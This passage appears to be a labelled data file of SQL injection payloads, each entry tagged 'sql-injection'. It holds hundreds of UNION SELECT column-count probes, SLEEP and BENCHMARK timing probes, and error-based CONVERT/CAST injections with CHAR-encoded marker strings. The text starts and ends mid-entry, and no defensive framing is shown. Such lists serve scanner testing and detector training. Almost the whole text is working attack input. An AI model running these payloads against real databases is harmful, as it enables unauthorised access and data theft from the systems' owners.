@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23' +sql-injection,'UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24' +sql-injection,'UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25' +sql-injection,'UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26' +sql-injection,'UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27' +sql-injection,'UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28' +sql-injection,'UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29' +sql-injection,'UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30' +sql-injection,'UNION SELECT @@VERSION,SLEEP(5),"'3' +sql-injection,'UNION SELECT @@VERSION,SLEEP(5),"'3'"#' +sql-injection,'UNION SELECT @@VERSION,SLEEP(5),USER(),4#' +sql-injection,'UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5#' +sql-injection,'UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6#' +sql-injection,'UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7#' +sql-injection,'UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8#' +sql-injection,'UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9#' +sql-injection,'UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10#' +sql-injection,'UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11#' +sql-injection,'UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12#' +sql-injection,'UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13#' +sql-injection,'UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14#' +sql-injection,'UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15#' +sql-injection,'UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16#' +sql-injection,'UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17#' +sql-injection,'UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18#' +sql-injection,'UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#' +sql-injection,'UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#' +sql-injection,'UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#' +sql-injection,'UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#' +sql-injection,'UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#' +sql-injection,'UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#' +sql-injection,'UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#' +sql-injection,'UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26#' +sql-injection,'UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27#' +sql-injection,'UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28#' +sql-injection,'UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29#' +sql-injection,'UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30#' +sql-injection,'UNION ALL SELECT USER()--' +sql-injection,'UNION ALL SELECT SLEEP(5)--' +sql-injection,'UNION ALL SELECT USER(),SLEEP(5)--' +sql-injection,'UNION ALL SELECT @@VERSION,USER(),SLEEP(5)--' +sql-injection,'UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A'))--' +sql-injection,'UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL--' +sql-injection,'UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL--' +sql-injection,'UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL--' +sql-injection,'UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL--' +sql-injection,'UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL--' +sql-injection,'UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL--' +sql-injection,'UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL--' +sql-injection,'UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--' +sql-injection,'UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--' +sql-injection,'UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--' +sql-injection,'UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--' +sql-injection,'UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--' +sql-injection,'UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--' +sql-injection,'UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--' +sql-injection,'UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--' +sql-injection,'UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--' +sql-injection,'UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--' +sql-injection,'UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--' +sql-injection,'UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--' +sql-injection,'UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--' +sql-injection,'UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--' +sql-injection,'UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--' +sql-injection,'UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--' +sql-injection,'UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--' +sql-injection,'UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--' +sql-injection,'UNION ALL SELECT NULL--' +sql-injection,'AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)))--' +sql-injection,'AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)))--' +sql-injection,'AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)))--' +sql-injection,'AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))--' +sql-injection,'AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))--' +sql-injection,'AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))--' +sql-injection,'AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)))--' +sql-injection,'AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)))--' +sql-injection,'AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)))--' +sql-injection,'AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)))--' +sql-injection,'AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)))--' +sql-injection,'AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)))--' +sql-injection,'AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)))--' +sql-injection,'AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)))--' +sql-injection,'AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)))--' +sql-injection,'AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)))--' +sql-injection,'AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)))--' +sql-injection,'AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)))--' +sql-injection,'AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))--' +sql-injection,'UNION ALL SELECT NULL#' +sql-injection,'AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)))#' +sql-injection,'AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)))#' +sql-injection,'AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)))#' +sql-injection,'AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))#' +sql-injection,'AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))#' +sql-injection,'AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))#' +sql-injection,'AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)))#' +sql-injection,'AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)))#' +sql-injection,'AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)))#' +sql-injection,'AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)))#' +sql-injection,'AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)))#' +sql-injection,'AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)))#' +sql-injection,'AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)))#' +sql-injection,'AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)))#' +sql-injection,'AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)))#' +sql-injection,'AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)))#' +sql-injection,'AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)))#' +sql-injection,'AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)))#' +sql-injection,'AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))#' +sql-injection,'UNION ALL SELECT NULL' +sql-injection,'AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)))' +sql-injection,'AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)))' +sql-injection,'AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)))' +sql-injection,'AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))' +sql-injection,'AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))' +sql-injection,'AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))' +sql-injection,'AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)))' +sql-injection,'AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)))' +sql-injection,'AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)))' +sql-injection,'AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)))' +sql-injection,'AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)))' +sql-injection,'AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)))' +sql-injection,'AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)))' +sql-injection,'AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)))' +sql-injection,'AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)))' +sql-injection,'AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)))' +sql-injection,'AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)))' +sql-injection,'AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)))' +sql-injection,'AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))' +sql-injection,'AND 5650=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(122)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (5650=5650) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))' +sql-injection,'AND 3516=CAST((CHR(113)||CHR(106)||CHR(122)||CHR(106)||CHR(113))||(SELECT (CASE WHEN (3516=3516) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(112)||CHR(106)||CHR(107)||CHR(113)) AS NUMERIC)' +sql-injection,'AND (SELECT 4523 FROM(SELECT COUNT(*),CONCAT(0x716a7a6a71,(SELECT (ELT(4523=4523,1))),0x71706a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)' +sql-injection,'UNION ALL SELECT CHAR(113)+CHAR(106)+CHAR(122)+CHAR(106)+CHAR(113)+CHAR(110)+CHAR(106)+CHAR(99)+CHAR(73)+CHAR(66)+CHAR(109)+CHAR(119)+CHAR(81)+CHAR(108)+CHAR(88)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113),NULL--' +sql-injection,'UNION ALL SELECT 'INJ'||'ECT'||'XXX'' +sql-injection,'UNION ALL SELECT 'INJ'||'ECT'||'XXX',2' +sql-injection,'UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3' +sql-injection,'UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4' +sql-injection,'UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5' +sql-injection,'UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6' +sql-injection,'UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7' +sql-injection,'UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8' +sql-injection,'UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9' +sql-injection,'UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10' +sql-injection,'UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11' +sql-injection,'UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12' +sql-injection,'UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13' +sql-injection,'UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14' +sql-injection,'UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15' +sql-injection,'UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16' +sql-injection,'UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17' +sql-injection,'UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18' +sql-injection,'UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19' +sql-injection,'UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20' +sql-injection,'UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21' +sql-injection,'UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22' +sql-injection,'UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23' +sql-injection,'UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24' +sql-injection,'UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25' +sql-injection,'UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26' +sql-injection,'UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27' +sql-injection,'UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28' +sql-injection,'UNION ALL SELECT 